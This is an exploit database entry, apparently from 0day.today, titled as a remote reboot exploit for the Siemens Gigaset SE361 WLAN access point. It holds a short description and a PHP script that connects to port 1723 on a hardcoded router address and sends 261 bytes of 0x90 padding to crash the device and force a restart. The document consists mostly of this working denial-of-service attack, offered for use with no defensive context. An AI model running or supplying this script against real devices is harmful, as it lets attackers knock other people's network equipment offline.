id: 7005
date: 09/10/2009
title: Siemens Gigaset SE361 WLAN Remote Reboot Exploit
author: crashbrz
cves: 

================================================
Siemens Gigaset SE361 WLAN Remote Reboot Exploit
================================================


Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP.
It takes a few bytes for the AP to automatically restart

<?php
$apaddr = "192.168.2.1";
$apport="1723";


$con = fsockopen($apaddr, $apport, $errno, $errstr);
if (!$con) {
    echo "$errstr ($errno)<br />\n";
} else {
    $trash = str_repeat("\x90","261");
    fwrite($con, $trash);
    while (!feof($con)) {
        echo "$trash \r\n";
    }
    fclose($con);
}
?> 



#  0day.today [2023-03-22]  #